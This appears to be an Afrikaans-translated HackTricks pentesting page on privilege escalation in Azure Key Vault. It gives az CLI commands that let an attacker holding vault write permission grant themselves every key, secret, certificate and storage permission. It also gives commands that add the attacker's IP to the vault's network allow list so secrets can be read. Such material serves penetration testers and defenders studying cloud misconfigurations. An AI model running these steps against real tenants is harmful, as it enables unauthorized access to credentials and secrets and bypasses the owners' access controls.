# Az - Key Vault Privesc

{{#include ../../../banners/hacktricks-training.md}}

## Azure Key Vault

Vir meer inligting oor hierdie diens, kyk:

{{#ref}}
../az-services/az-keyvault.md
{{#endref}}

### `Microsoft.KeyVault/vaults/write`

'n Aanvaller met hierdie toestemming sal in staat wees om die beleid van 'n sleutelkluis te wysig (die sleutelkluis moet toegangbeleide gebruik in plaas van RBAC).
```bash
# If access policies in the output, then you can abuse it
az keyvault show --name <vault-name>

# Get current principal ID
az ad signed-in-user show --query id --output tsv

# Assign all permissions
az keyvault set-policy \
--name <vault-name> \
--object-id <your-object-id> \
--key-permissions all \
--secret-permissions all \
--certificate-permissions all \
--storage-permissions all
```
### Pas Netwerkbeperkings Aan

Dit mag dalk moontlik wees dat jy genoeg toestemmings het om sensitiewe data (soos die waarde van 'n geheim) te bekom, maar jy kan dit nie bekom nie omdat die sleutelkluis beperk is tot 'n spesifieke netwerk. As jy die toestemming het om die netwerkbeperkings aan te pas, kan jy jou IP by die lys van toegelate IP's voeg.
```bash
# Get the current network restrictions
az keyvault network-rule list --name <vault-name>

# Add your IP to the list
az keyvault network-rule add --name <vault-name> --ip-address <your-ip>
```
{{#include ../../../banners/hacktricks-training.md}}
